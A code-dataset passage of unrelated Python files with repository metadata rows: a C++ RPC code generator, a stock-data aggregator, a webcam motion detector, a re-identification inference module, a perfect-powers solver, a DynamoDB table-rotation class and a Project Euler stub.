        m_cpp_ret_type = m_cpp_ret_type if m_cpp_ret_type != "void" else "json_null_t"
        print(f"    {m_cpp_ret_type} retval;", file = out_fd)
        print("  };", file = out_fd)
        print("  void do_call(const std::string& req_s, std::string* res_s, std::shared_ptr<ix::WebSocket>) override;", file = out_fd)
        print("};", file = out_fd)
        print(f"}}", file = out_fd)
        # get_struct_descriptor for args_t, return_t, Request<args_t>, Response<return_t>
        print(f"template <> inline StructDescriptor get_struct_descriptor<{cpp_namespace}::{method_impl_class_name}::args_t>()", file = out_fd)
        print("{", file = out_fd)
        print("  static const StructDescriptor sd = {", file = out_fd)
        for m_arg in m_def.get_method_args():
            print(f"    make_member_descriptor(\"{m_arg}\", &{cpp_namespace}::{method_impl_class_name}::args_t::{m_arg}),", file = out_fd)
        print("  };", file = out_fd)
        print("  return sd;", file = out_fd)
        print("}", file = out_fd)
        print(f"template <> inline StructDescriptor get_struct_descriptor<::pybx::Request<{cpp_namespace}::{method_impl_class_name}::args_t>>()", file = out_fd)
        print("{", file = out_fd)
        print(f"  return get_StructDescriptor_T<{cpp_namespace}::{method_impl_class_name}::args_t, ::pybx::Request>::get_struct_descriptor();", file = out_fd)
        print("}", file = out_fd)
        print(f"template <> inline StructDescriptor get_struct_descriptor<{cpp_namespace}::{method_impl_class_name}::return_t>()", file = out_fd)
        print("{", file = out_fd)
        print("  static const StructDescriptor sd = {", file = out_fd)
        print(f"    make_member_descriptor(\"retval\", &{cpp_namespace}::{method_impl_class_name}::return_t::retval),", file = out_fd)
        print("  };", file = out_fd)
        print("  return sd;", file = out_fd)
        print("}", file = out_fd)
        print(f"template <> inline StructDescriptor get_struct_descriptor<::pybx::Response<{cpp_namespace}::{method_impl_class_name}::return_t>>()", file = out_fd)
        print("{", file = out_fd)
        print(f"  return get_StructDescriptor_T<{cpp_namespace}::{method_impl_class_name}::return_t, ::pybx::Response>::get_struct_descriptor();", file = out_fd)
        print("}", file = out_fd)
def generate_interface_client_definitions(interface_def, out_fd):
    """Emit the out-of-line definitions of the _rop proxy: constructors,
    activate(), and (via the helper) every remote method body."""
    cpp_namespace = get_cpp_namespace(interface_def.def_type.__module__)
    class_name = f"{interface_def.name}_rop"
    print(f"namespace {cpp_namespace} {{", file = out_fd)
    # default constructor (inactive proxy)
    print(f"inline {class_name}::{class_name}()", file = out_fd)
    print("{", file = out_fd)
    print("}", file = out_fd)
    # full constructor: communicator + live websocket + ids
    print(f"inline {class_name}::{class_name}(::pybx::Communicator* comm,", file = out_fd)
    print("std::shared_ptr<ix::WebSocket> ws,", file = out_fd)
    print("const std::string& ws_url, const std::string& object_id)", file = out_fd)
    print("{", file = out_fd)
    print("  this->comm = comm;", file = out_fd)
    print("  this->ws = ws;", file = out_fd)
    print("  this->object_id = object_id;", file = out_fd)
    print("}", file = out_fd)
    # constructor without a websocket; activate() supplies it later
    print(f"inline {class_name}::{class_name}(::pybx::Communicator* comm, const std::string& object_id)", file = out_fd)
    print("{", file = out_fd)
    print("  this->comm = comm;", file = out_fd)
    print("  this->object_id = object_id;", file = out_fd)
    print("}", file = out_fd)
    print(f"inline void {class_name}::activate(::pybx::Communicator* c, std::shared_ptr<ix::WebSocket> ws)", file = out_fd)
    method_activate_code = f"""
{{
  this->comm = c;
  if (this->ws == nullptr) {{
    this->ws = ws;
  }} else {{
    throw runtime_error("{class_name}::activate: not implemented for universal rop");
  }}
}}
"""
    print(method_activate_code, file = out_fd)
    # one definition per remote method
    for m_def in interface_def.methods:
        generate_interface_client_method_definition(class_name, interface_def.name, m_def, out_fd)
    print(f"}} // end of namespace", file = out_fd)
def generate_interface_client_method_definition(rop_class_name, interface_class_name, m_def, out_fd):
    """Emit one _rop method body: build a ::pybx::Request, send it over the
    websocket, and (unless oneway) wait for and unpack the Response."""
    # rop methods
    method_impl_class_name = f"{interface_class_name}__{m_def.name}"
    m_args_l = []
    for t, n in zip(m_def.get_method_arg_types(), m_def.get_method_args()):
        tt = t.get_cpp_code_name()
        m_args_l.append(f"{tt} {n}")
    m_args = ",".join(m_args_l)
    m_ret_type = m_def.get_method_return_type().get_cpp_code_name()
    # for void methods the generated "ret" lines are commented out
    disable_void_return = "//" if m_ret_type == "void" else ""
    # one "req.args.<x>=<x>;" assignment per method argument
    req_args_assignments = ";\n".join(["req.args." + x + "=" + x for x in m_def.get_method_args()])
    print(f"inline {m_ret_type} {rop_class_name}::{m_def.name}({m_args})", file = out_fd)
    print("{", file = out_fd)
    rop_method_template = f"""
  ::pybx::Request<{method_impl_class_name}::args_t> req{{
    .message_type = this->oneway ? ::pybx::message_type_t::METHOD_ONEWAY_CALL : ::pybx::message_type_t::METHOD_CALL,
    .message_id = ::pybx::create_new_message_id(),
    .method_signature = "{method_impl_class_name}",
    .object_id = object_id,
    .args = {method_impl_class_name}::args_t()
  }};
  {req_args_assignments};
  {disable_void_return} {m_ret_type} ret;
  ostringstream json_os;
  to_json(json_os, req);
  if (this->oneway) {{
    comm->send_oneway(ws, json_os.str(), req.message_id);
  }} else {{
    auto res_s = comm->send_and_wait_for_response(ws, json_os.str(), req.message_id);
    comm->check_response(res_s.first, res_s.second);
    ::pybx::Response<{method_impl_class_name}::return_t> res;
    from_json(&res, res_s.second);
    {disable_void_return} ret = res.retval.retval;
  }}
  {disable_void_return} return ret;
"""
    print(rop_method_template, file = out_fd)
    print("}", file = out_fd)
def generate_interface_server_method_impls(module_def, interface_def, out_fd):
    # Emit the namespace-wrapped server-side do_call() definitions (and their
    # registrations) for every method of the given interface.
    cpp_namespace = get_cpp_namespace(interface_def.def_type.__module__)
    print(f"namespace {cpp_namespace} {{", file = out_fd)
    for m_def in interface_def.methods:
        generate_interface_server_method_impl_definition(module_def, interface_def, m_def, out_fd)
    print(f"}}", file = out_fd)
def generate_interface_server_method_impl_definition(module_def, interface_def, m_def, out_fd):
    # Emit the server-side do_call() for one method: decode the request,
    # activate any rop (remote object proxy) arguments, dispatch to the real
    # object, and encode either the response or an exception response.
    #ipdb.set_trace()
    # The activation code below is a temporary setup capable of handling the
    # server-callback use case only.  More rigorous type support is required
    # for all possible combinations (vectors of rops, rop return values,
    # etc.).
    activations = []
    if 1:
        args_with_activation = []
        for arg, arg_type in zip(m_def.get_method_args(), m_def.get_method_arg_types()):
            if arg_type.is_rop_type():
                # Bind the proxy argument to this connection's websocket.
                activations.append(f"req.args.{arg}.activate(comm, ws);")
    activations_code = "\n".join(activations)
    # Argument expressions forwarded to the target method.
    m_args = ", ".join(["req.args." + x for x in m_def.get_method_args()])
    m_ret_type = m_def.get_method_return_type().get_cpp_code_name()
    # Comment out the result assignment for void methods.
    disable_void_return = "//" if m_ret_type == "void" else ""
    # Body template; doubled braces are literal braces in the f-string.
    method_impl_do_call_tmpl = f"""
    ostringstream res_os;
    try {{
        ::pybx::Request<args_t> req;
        from_json(&req, req_s);
        {activations_code}
        auto o = comm->find_object(req.object_id);
        auto self = dynamic_pointer_cast<{interface_def.name}>(o);
        if (self == nullptr) {{
            throw runtime_error("dyn type mismatch");
        }}
        ::pybx::Response<return_t> res;
        res.message_id = ::pybx::create_new_message_id();
        res.orig_message_id = req.message_id;
        {disable_void_return} res.retval.retval =
           self->{m_def.name}({m_args});
        to_json(res_os, res);
    }} catch (exception& e) {{
        ::pybx::ExceptionResponse eres;
        eres.message_id = ::pybx::create_new_message_id();
        eres.orig_message_id = ::pybx::get_message_id(req_s);
        eres.remote_exception_text = e.what();
        to_json(res_os, eres);
    }}
    *res_s = res_os.str();
    """
    class_name = f"{interface_def.name}__{m_def.name}"
    print(f"inline void {class_name}::do_call(const string& req_s, string* res_s, shared_ptr<ix::WebSocket> ws)", file = out_fd)
    print("{", file = out_fd)
    print(method_impl_do_call_tmpl, file = out_fd)
    print("}", file = out_fd)
    # Static registration: maps the wire signature to an impl instance.
    print(f"UNIQUE = ::pybx::RemoteMethods::register_method(\"{class_name}\", std::make_shared<{class_name}>());", file = out_fd)
def generate_cpp_file(module_def, out_fd, source_pybx_fn):
    # Top-level driver: write the complete generated C++ header for one .pybx
    # module - prolog, enums, structs, client forward declarations, client and
    # server declarations, then all out-of-line definitions, then the epilog.
    generate_prolog(source_pybx_fn, out_fd)
    for enum_def in module_def.enums:
        generate_enum_def(enum_def, out_fd)
    # struct_order is presumably dependency-ordered so that nested struct
    # types are emitted before their users -- TODO confirm where it is built.
    for struct_name in module_def.struct_order:
        struct_def = module_def.structs[struct_name]
        generate_struct_def(struct_def, out_fd)
    generate_interface_client_forward_declarations(module_def, out_fd)
    for interface_def in module_def.interfaces:
        generate_interface_client_declarations(interface_def, out_fd)
    #ipdb.set_trace()
    for interface_def in module_def.interfaces:
        generate_interface_server_declarations(interface_def, out_fd)
    for interface_def in module_def.interfaces:
        generate_interface_client_definitions(interface_def, out_fd)
    for interface_def in module_def.interfaces:
        generate_interface_server_method_impls(module_def, interface_def, out_fd)
    generate_epilog(out_fd)
| UTF-8 | Python | false | false | 17,470 | py | 45 | codegen_cpp.py | 32 | 0.607155 | 0.606754 | 0 | 377 | 45.339523 | 164 |
Hansen-chen/python_demo_program | 6,124,623,367,373 | f78ed3d01a66ba28f40e64c5ced3fe2672c54a69 | bf6e9f82f990057de2e8c621d5818584688400e4 | /venv/main.py | f4f6046d81c1420ce3873a7850289a210ba98559 | [] | no_license | https://github.com/Hansen-chen/python_demo_program | 4475843b1019a96ca1703331c61766797766fd34 | d0cf12a2cbaea0fbb3860e8e915d2d0bf273fad1 | refs/heads/master | "2020-07-08T17:55:09.875184" | "2019-08-22T07:31:41" | "2019-08-22T07:31:41" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Parse HKEX HSI rows and summarize the column-9 field per hour of day.
import numpy as np
import pandas as pd
import datetime as dt
import matplotlib.pyplot as plt
# Parallel lists: one timestamp and one column-9 value per parsed row.
# The column-9 field is presumably a categorical/candlestick code -- TODO
# confirm against the data file's header row.
data_datetime = []
data_candlestick = []
try:
    # Space-separated data; the first two columns are date and time in
    # "%d/%m/%Y %H:%M:%S" format.
    f = open('HKEX.HSI.txt', 'r')
    #data = f.read()
    #print(data)
    separator=" "
    for line in f:
        columns = line.split(separator)
        if len(columns) >= 1:
            #print(columns[0]+" "+columns[1])
            try:
                data_datetime.append(dt.datetime.strptime(columns[0]+" "+columns[1], '%d/%m/%Y %H:%M:%S'))
                data_candlestick.append(columns[9].rstrip())
            except ValueError:
                # Rows whose first two fields do not parse as a date (e.g.
                # the header line) land here and are skipped.
                print("first line")
finally:
    # Aggregate whatever was parsed, even if reading aborted part-way.
    data_candlestick = np.array(data_candlestick)
    data_candlestick = data_candlestick.astype(np.int)
    #check hourly aggregate data
    data_dictionary = dict(zip(data_datetime, data_candlestick))
    df = pd.DataFrame({'time':data_datetime, 'type':data_candlestick})
    # Sum the 'type' column per clock hour, then describe the distribution
    # of those hourly sums grouped by hour of day (0-23).
    df = df.set_index('time').groupby([pd.Grouper(freq='H')]).sum()
    print(df.groupby(df.index.map(lambda t: t.hour)).describe())
    #print(test)
    if f:
        f.close()
| UTF-8 | Python | false | false | 1,176 | py | 1 | main.py | 1 | 0.57483 | 0.568878 | 0 | 41 | 27.170732 | 106 |
Pranjal290/Web-Cam-Motion-Detector | 712,964,584,445 | 748aa3f1a2207881b36606aac03ce9a423f55fc9 | b1ac6f26f7a235703eed1eaf15ad72b619cff451 | /video_capture.py | 08257898566ad4f792cd6136bf695d3ee9b30c84 | [] | no_license | https://github.com/Pranjal290/Web-Cam-Motion-Detector | 801dde1398e166f8af1b4e8c17004df9dab2aa40 | b22e331b82864c7d17ea614d77189ec2101c5909 | refs/heads/master | "2020-11-27T21:51:24.731563" | "2019-12-22T18:54:11" | "2019-12-22T18:54:11" | 229,615,225 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import cv2,time,pandas
# Webcam motion detector: compares each frame against the first captured
# frame, draws rectangles around large moving regions, and records the
# start/end timestamps of every motion episode to Times.csv.
from datetime import datetime
first_frame=None
video=cv2.VideoCapture(0)
# Last two motion statuses (0 = still, 1 = motion); seeded with two entries
# so that status_list[-2] is always a valid index.
status_list=[None,None]
# NOTE: this list shadows the imported 'time' module (which is unused here).
time=[]
df=pandas.DataFrame(columns=['Start','End'])  # motion episode start/end times
while True:
    check,frame=video.read()
    status=0
    # Grey-scale + blur so the frame difference is robust to pixel noise.
    grey=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
    grey=cv2.GaussianBlur(grey,(21,21),0)
    if first_frame is None:
        first_frame=grey  # reference background frame
        continue
    # Absolute difference against the reference frame, thresholded to a
    # binary motion mask and dilated to fill small holes.
    delta_frame=cv2.absdiff(first_frame,grey)
    tresh_delta=cv2.threshold(delta_frame,30,255,cv2.THRESH_BINARY)[1]
    tresh_delta=cv2.dilate(tresh_delta,None,iterations=2)
    (cnts,_)=cv2.findContours(tresh_delta.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
    for contour in cnts:
        if cv2.contourArea(contour)<10000:  # ignore small movements
            continue
        status=1
        (x,y,w,h)=cv2.boundingRect(contour)
        # BUGFIX: the bottom-right corner is (x+w, y+h); the original used
        # y+w, which drew a square of the wrong height.
        cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),3)
    status_list.append(status)
    # A 0 -> 1 transition marks motion start; 1 -> 0 marks motion end.
    if status_list[-1]==1 and status_list[-2]==0:
        time.append(datetime.now())
    if status_list[-1]==0 and status_list[-2]==1:
        time.append(datetime.now())
    cv2.imshow("Delta Frame",delta_frame)
    cv2.imshow("Threshhold Frame",tresh_delta)
    cv2.imshow("Colour Frame",frame)
    key =cv2.waitKey(1)
    if key==ord('q'):  # press 'q' to quit
        if status==1:
            time.append(datetime.now())  # close the still-open episode
        break
# Pair up (start, end) timestamps and persist them (DataFrame.append is the
# pandas<2 API, matching the rest of this script).
for i in range(0,len(time),2):
    df=df.append({"Start":time[i],"End":time[i+1]},ignore_index=True)
df.to_csv("Times.csv")
video.release()
# BUGFIX: destroyAllWindows was referenced but never called.
cv2.destroyAllWindows()
# PRESS 'q' ON KEYBOARD TO STOP THE PROGRAM | UTF-8 | Python | false | false | 2,076 | py | 3 | video_capture.py | 1 | 0.656069 | 0.627168 | 0 | 55 | 35.781818 | 129 |
abandonsea/msba_reid | 12,103,217,886,279 | 1459e19999eced757abe35aca1118546c8e59556 | 68f76af689d79d3e4a94354a4e644a878d8cfd40 | /engine/deprecated/v2/inference_save_res.py | cd2f824e553a79fdf65d5a684cb77b4b77ab87d6 | [] | no_license | https://github.com/abandonsea/msba_reid | b9d00660141f8e657ac090d1426d00a36d19fed9 | 831158247ed116e82a9ed285e25974abdfbf755b | refs/heads/master | "2023-07-15T20:01:15.274850" | "2020-01-07T02:28:09" | "2020-01-07T02:28:09" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # encoding: utf-8
"""
@author: liaoxingyu
@contact: sherlockliao01@gmail.com
"""
import logging
import torch
import numpy as np
import torch.nn.functional as F
from data.datasets.eval_reid import evaluate
from data.prefetcher import data_prefetcher
from utils.re_ranking import re_ranking
from utils.distance import low_memory_local_dist, local_dist
def inference(
        cfg,
        model,
        test_dataloader,
        num_query,
        thetas
):
    """Extract features for the whole test set, split them into query and
    gallery halves, and compute re-ranked distance matrices.

    The first num_query samples of test_dataloader are queries, the rest the
    gallery.  use_rerank below is hard-wired True, so one (score, index,
    distmat) triple is produced per theta and the lists are returned as
    (scores, indices, dist_mats); the non-reranked branch is currently dead.
    """
    logger = logging.getLogger("reid_baseline.inference")
    logger.info("Start inferencing")
    model.eval()
    feats, pids, camids = [], [], []
    local_feats = []
    test_prefetcher = data_prefetcher(test_dataloader)
    batch = test_prefetcher.next()
    while batch[0] is not None:
        img, pid, camid = batch
        with torch.no_grad():
            feat = model(img)
            # Models with an aligned branch return (global_feat, local_feat).
            if isinstance(feat, tuple):
                feats.append(feat[0])
                local_feats.append(feat[1])
            else:
                feats.append(feat)
        pids.extend(pid.cpu().numpy())
        camids.extend(np.asarray(camid))
        batch = test_prefetcher.next()
    feats = torch.cat(feats, dim=0)
    if len(local_feats) > 0:
        local_feats = torch.cat(local_feats, dim=0)
    if cfg.TEST.NORM:
        # L2-normalize so dot products behave like cosine similarity.
        feats = F.normalize(feats, p=2, dim=1)
        if len(local_feats) > 0:
            local_feats = F.normalize(local_feats, p=2, dim=1)
    # query
    qf = feats[:num_query]
    if len(local_feats) > 0:
        lqf = local_feats[:num_query]
    # gallery
    gf = feats[num_query:]
    if len(local_feats) > 0:
        lgf = local_feats[num_query:]
    if len(local_feats) > 0:
        # Calculate the local (part-aligned) distances and assemble the full
        # (query+gallery) x (query+gallery) block matrix expected by
        # re_ranking.
        lqf = lqf.permute(0, 2, 1)
        lgf = lgf.permute(0, 2, 1)
        #logger.info('Computing local_qg_distmat ...')
        local_qg_distmat = low_memory_local_dist(lqf.cpu().numpy(), lgf.cpu().numpy(), aligned=True)
        #logger.info('Computing local_qq_distmat ...')
        local_qq_distmat = low_memory_local_dist(lqf.cpu().numpy(), lqf.cpu().numpy(), aligned=True)
        #logger.info('Computing local_gg_distmat ...')
        local_gg_distmat = low_memory_local_dist(lgf.cpu().numpy(), lgf.cpu().numpy(), aligned=True)
        local_distmat = np.concatenate(
            [np.concatenate([local_qq_distmat, local_qg_distmat], axis=1),
             np.concatenate([local_qg_distmat.T, local_gg_distmat], axis=1)],
            axis=0)
    else:
        local_distmat = None
    use_rerank = True
    if use_rerank:
        #thetas = [0.4, 0.5, 0.9, 0.95, 1.0]
        scores, indices, dist_mats = [], [], []
        logger.info("use reranking")
        for theta in thetas:
            distmat = re_ranking(qf, gf, k1=6, k2=2, lambda_value=0.3, local_distmat=local_distmat, theta_value=theta)
            score = distmat
            index = np.argsort(score, axis=1)  # from small to large
            scores.append(score)
            indices.append(index)
            dist_mats.append(distmat)
        return scores, indices, dist_mats
    else:
        # Dead branch while use_rerank is hard-wired True: plain negative
        # inner-product distance without re-ranking.
        logger.info("No reranking")
        distmat = -torch.mm(qf, gf.t()).cpu().numpy()
        score = distmat
        index = np.argsort(score, axis=1)  # from small to large
        return score, index
def inference_flipped(
        cfg,
        model,
        test_dataloader,
        num_query,
        thetas,
        use_local_feature=True  # whether to use the local (part-based) features
):
    """Like inference(), but also runs every image horizontally flipped and
    averages the normal and flipped re-ranked distance matrices.

    Returns (scores, indices, dist_mats), one entry per theta.
    """
    logger = logging.getLogger("reid_baseline.inference")
    logger.info("Start inferencing")
    model.eval()
    # g_* = global features, l_* = local features; the *f_* variants come
    # from the horizontally flipped images.
    g_feats, l_feats, gf_feats, lf_feats, pids, camids = [], [], [], [], [], []
    val_prefetcher = data_prefetcher(test_dataloader)
    batch = val_prefetcher.next()
    while batch[0] is not None:
        img, pid, camid = batch
        with torch.no_grad():
            g_feat, l_feat = model(img)
            # Flip along dim 3 (width) for the mirrored pass.
            gf_feat, lf_feat = model(torch.flip(img, [3]))
            g_feats.append(g_feat.data.cpu())
            l_feats.append(l_feat.data.cpu())
            gf_feats.append(gf_feat.data.cpu())
            lf_feats.append(lf_feat.data.cpu())
        pids.extend(pid.cpu().numpy())
        camids.extend(np.asarray(camid))
        batch = val_prefetcher.next()
    g_feats = torch.cat(g_feats, dim=0)
    l_feats = torch.cat(l_feats, dim=0)
    gf_feats = torch.cat(gf_feats, dim=0)
    lf_feats = torch.cat(lf_feats, dim=0)
    if cfg.TEST.NORM:
        # Only the global features are L2-normalized here.
        g_feats = F.normalize(g_feats, p=2, dim=1)
        gf_feats = F.normalize(gf_feats, p=2, dim=1)
    # query
    qf = g_feats[:num_query]
    lqf = l_feats[:num_query]
    qff = gf_feats[:num_query]
    lqff = lf_feats[:num_query]
    q_pids = np.asarray(pids[:num_query])
    q_camids = np.asarray(camids[:num_query])
    # gallery
    gf = g_feats[num_query:]
    lgf = l_feats[num_query:]
    gff = gf_feats[num_query:]
    lgff = lf_feats[num_query:]
    g_pids = np.asarray(pids[num_query:])
    g_camids = np.asarray(camids[num_query:])
    # calculate the global distance
    scores, indices, dist_mats = [], [], []
    #use_local_feature = True
    if use_local_feature:
        # Assemble the (query+gallery) x (query+gallery) local distance block
        # matrices for both the normal and the flipped features.
        logger.info("--------computing local features ...--------")
        lqf = lqf.permute(0, 2, 1)
        lgf = lgf.permute(0, 2, 1)
        local_distmat = low_memory_local_dist(lqf.numpy(), lgf.numpy(), aligned=True)
        local_qq_distmat = low_memory_local_dist(lqf.numpy(), lqf.numpy(), aligned=True)
        local_gg_distmat = low_memory_local_dist(lgf.numpy(), lgf.numpy(), aligned=True)
        local_dist = np.concatenate(
            [np.concatenate([local_qq_distmat, local_distmat], axis=1),
             np.concatenate([local_distmat.T, local_gg_distmat], axis=1)],
            axis=0)
        logger.info("--------computing flipped local features ...--------")
        lqff = lqff.permute(0, 2, 1)
        lgff = lgff.permute(0, 2, 1)
        local_distmat = low_memory_local_dist(lqff.numpy(), lgff.numpy(), aligned=True)
        local_qq_distmat = low_memory_local_dist(lqff.numpy(), lqff.numpy(), aligned=True)
        local_gg_distmat = low_memory_local_dist(lgff.numpy(), lgff.numpy(), aligned=True)
        local_dist_flip = np.concatenate(
            [np.concatenate([local_qq_distmat, local_distmat], axis=1),
             np.concatenate([local_distmat.T, local_gg_distmat], axis=1)],
            axis=0)
    else:
        local_dist = None
        local_dist_flip = None
    logger.info("use reranking")
    for theta in thetas:
        distmat = re_ranking(qf, gf, k1=6, k2=2, lambda_value=0.3, local_distmat=local_dist, theta_value=theta,
                             only_local=False)
        distmat_flip = re_ranking(qff, gff, k1=6, k2=2, lambda_value=0.3, local_distmat=local_dist_flip, theta_value=theta,
                                  only_local=False)
        # Average the normal and flipped distance matrices.
        distmat = (distmat + distmat_flip) / 2
        score = distmat
        index = np.argsort(score, axis=1)  # from small to large
        scores.append(score)
        indices.append(index)
        dist_mats.append(distmat)
    return scores, indices, dist_mats
| UTF-8 | Python | false | false | 7,072 | py | 93 | inference_save_res.py | 89 | 0.585791 | 0.573454 | 0 | 210 | 32.580952 | 123 |
0AdityaD/competitive | 5,231,270,201,215 | a0de5dbc78d4888f9483265ed57136360ba28a7d | 7e2b5fa590b34bb589f97242b1e139219ab6c97b | /kattis/perfect_powers.py | aa2166e84902b4b0b927c4e09ef11a64d2eb43cb | [] | no_license | https://github.com/0AdityaD/competitive | a7195c8096fc443d2aa506910da472b8b0a21226 | 497345e0cdad058d57bb84dc96dfc1856eae5cbe | refs/heads/master | "2020-03-01T21:40:08.350769" | "2020-02-26T08:54:37" | "2020-02-26T08:54:37" | 83,923,869 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from collections import defaultdict
from random import randint
def gcd2(a, b):
    """Greatest common divisor of two non-negative integers (Euclid)."""
    larger, smaller = max(a, b), min(a, b)
    return larger if smaller == 0 else gcd2(smaller, larger % smaller)
def gcd(ls):
    """Return the greatest common divisor of a list of non-negative ints.

    An empty list yields 1, matching the convention used by solve() when
    the factorization of |x| is empty (i.e. |x| == 1).

    Uses the C-implemented math.gcd instead of the hand-rolled recursive
    fold, which also avoids recursion-depth concerns.
    """
    import math
    from functools import reduce
    if not ls:
        return 1
    return reduce(math.gcd, ls)
def is_prime(n, primes):
    """Trial-divide n by the given ascending primes.

    Correct only when primes contains every prime up to sqrt(n) and n
    itself is not in primes (a prime divides itself and would be reported
    composite) -- which holds for how gen_primes() calls it.
    """
    for p in primes:
        if n % p == 0:
            return False
        if p * p > n:
            return True
    return True
def gen_primes():
    """All primes up to 100000, ascending, via trial division of odd candidates."""
    found = [2, 3]
    candidate = 5
    while candidate <= 99999:
        if is_prime(candidate, found):
            found.append(candidate)
        candidate += 2
    return found
def factor(x, primes):
    """Prime factorization of x (x >= 1) as a defaultdict {prime: exponent}.

    primes must hold every prime up to sqrt(x) in ascending order; any
    cofactor left over after the loop is itself prime and recorded.
    """
    exponents = defaultdict(int)
    for p in primes:
        if p * p > x:
            break
        while True:
            quotient, remainder = divmod(x, p)
            if remainder:
                break
            x = quotient
            exponents[p] += 1
    if x > 1:
        exponents[x] += 1
    return exponents
def solve(x, primes):
    """Print the largest k such that x is a perfect k-th power.

    k is the gcd of the exponents in |x|'s prime factorization; for
    negative x every factor of two is stripped out of k, because an even
    power can never be negative.
    """
    exponents = factor(abs(x), primes)
    k = gcd(list(exponents.values()))
    if x < 0:
        while k % 2 == 0:
            k //= 2
    print(k)
def main():
    """Read integers until a terminating 0, printing each one's answer."""
    prime_table = gen_primes()
    while True:
        value = int(input())
        if value == 0:
            break
        solve(value, prime_table)
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 1,291 | py | 773 | perfect_powers.py | 757 | 0.497289 | 0.4756 | 0 | 69 | 17.710145 | 37 |
yuyasugano/dynamodb-ohlcv-crypto | 13,357,348,303,150 | 6a7100eaa504f3af78074814e23425941039c281 | f3ac44c5c376a3f7e1b6d384c26916d4e9c43dde | /dynamodb-sam/resizer.py | f41f00cc69fc9ea3c2f369b10fa4d9419ea392a6 | [
"MIT"
] | permissive | https://github.com/yuyasugano/dynamodb-ohlcv-crypto | ddbfef21b220a65a923a3ea766c54ab0a4d07c7f | c7bef03bccb43baaf306c9d1f2a32c6fbccc57fa | refs/heads/master | "2022-12-01T04:17:02.025759" | "2020-08-12T02:27:03" | "2020-08-12T02:27:03" | 286,716,162 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import boto3
import datetime
region = os.environ.get('AWS_DEFAULT_REGION', 'ap-northeast-1')
dynamodb = boto3.client('dynamodb', region_name=region)
class DailyResize(object):
    """Daily DynamoDB table rotation.

    Tables are named "<prefix>_YYYY-MM-DD".  Each day: create tomorrow's
    table with write-day throughput, downsize yesterday's table, and delete
    the table from a week ago.  All AWS calls go through the module-level
    `dynamodb` client.
    """

    # Throughput for the freshly created (actively written) table.
    FIRST_DAY_RCU, FIRST_DAY_WCU = 3, 3
    # Reduced throughput for tables a day old or more.
    OLD_DAY_RCU, OLD_DAY_WCU = 1, 1

    def __init__(self, table_prefix):
        self.table_prefix = table_prefix

    def create_new(self):
        """Create tomorrow's table with a (name, datetime) key schema.

        Returns the new table's name.
        """
        tomorrow = datetime.date.today() + datetime.timedelta(1)
        new_table_name = "{}_{}".format(self.table_prefix, self._format_date(tomorrow))
        dynamodb.create_table(
            TableName = new_table_name,
            KeySchema = [
                {
                    'AttributeName': 'name',
                    'KeyType': 'HASH' # Partition Key
                },
                {
                    'AttributeName': 'datetime',
                    'KeyType': 'RANGE' # Sort Key
                }
            ],
            AttributeDefinitions = [
                {
                    'AttributeName': 'name',
                    'AttributeType': 'S',
                },
                {
                    'AttributeName': 'datetime',
                    'AttributeType': 'S'
                }
            ],
            ProvisionedThroughput = {
                'ReadCapacityUnits': self.FIRST_DAY_RCU,
                'WriteCapacityUnits': self.FIRST_DAY_WCU
            },
        )
        print("Table created with name {}".format(new_table_name))
        return new_table_name

    def resize_old(self):
        """Downsize yesterday's table to the reduced throughput."""
        yesterday = datetime.date.today() - datetime.timedelta(1)
        old_table_name = "{}_{}".format(self.table_prefix, self._format_date(yesterday))
        self._update_table(old_table_name, self.OLD_DAY_RCU, self.OLD_DAY_WCU)
        return 'OK'

    def delete_old(self):
        """Delete the table from seven days ago."""
        weekago = datetime.date.today() - datetime.timedelta(7)
        old_table_name = "{}_{}".format(self.table_prefix, self._format_date(weekago))
        self._delete_table(old_table_name)
        return 'OK'

    def _update_table(self, table_name, RCU, WCU):
        """ Update RCU/WCU of the given table (if exists) """
        print("Updating table with name {}".format(table_name))
        try:
            dynamodb.update_table(
                TableName = table_name,
                # BUGFIX: the parameter was misspelled "ProvidionedThroughput",
                # which made every update call fail parameter validation.
                ProvisionedThroughput = {
                    'ReadCapacityUnits': RCU,
                    'WriteCapacityUnits': WCU,
                },
            )
        except dynamodb.exceptions.ResourceNotFoundException as e:
            print("DynamoDB Table {} not found".format(table_name))

    def _delete_table(self, table_name):
        """ Delete the given table (if exists) """
        print("Deleting table with name {}".format(table_name))
        try:
            dynamodb.delete_table(TableName = table_name)
        except dynamodb.exceptions.ResourceInUseException as e:
            print("DynamoDB Table {} in use".format(table_name))
        except dynamodb.exceptions.ResourceNotFoundException as e:
            print("DynamoDB Table {} not found".format(table_name))

    @staticmethod
    def _format_date(d):
        """Date suffix used in table names, e.g. '2020-08-12'."""
        return d.strftime("%Y-%m-%d")
| UTF-8 | Python | false | false | 3,276 | py | 7 | resizer.py | 4 | 0.539377 | 0.536325 | 0 | 94 | 33.840426 | 88 |
piohhmy/euler | 16,870,631,575,771 | 99b98d97fbd91616fb282d1e3d0891bb245f7c95 | 7af1b10e4389a4be5f2f22f3178fff2503280929 | /p022.py | 0861e4c3a41fafc703117affd664275c7bc87c1d | [
"MIT"
] | permissive | https://github.com/piohhmy/euler | 559f15fa9f7f5c644b65b43674646e0f520fd46e | f1b548a28a503fb8a0878fda75c32e1dcfb33243 | refs/heads/master | "2021-01-02T08:39:00.142314" | "2016-01-22T15:32:46" | "2016-01-22T15:32:46" | 11,699,388 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """ Using names.txt (right click and 'Save Link/Target As...'), a 46K text
file containing over five-thousand first names, begin by sorting it into
alphabetical order. Then working out the alphabetical value for each name,
multiply this value by its alphabetical position in the list to obtain a
name score.
For example, when the list is sorted into alphabetical order, COLIN, which is
worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN
would obtain a score of 938 x 53 = 49714.
What is the total of all the name scores in the file? """
def alphabetical_value(name):
    """Sum of 1-based alphabet positions of the uppercase letters in *name*.

    'A' -> 1, ..., 'Z' -> 26; e.g. "COLIN" -> 3+15+12+9+14 = 53.
    """
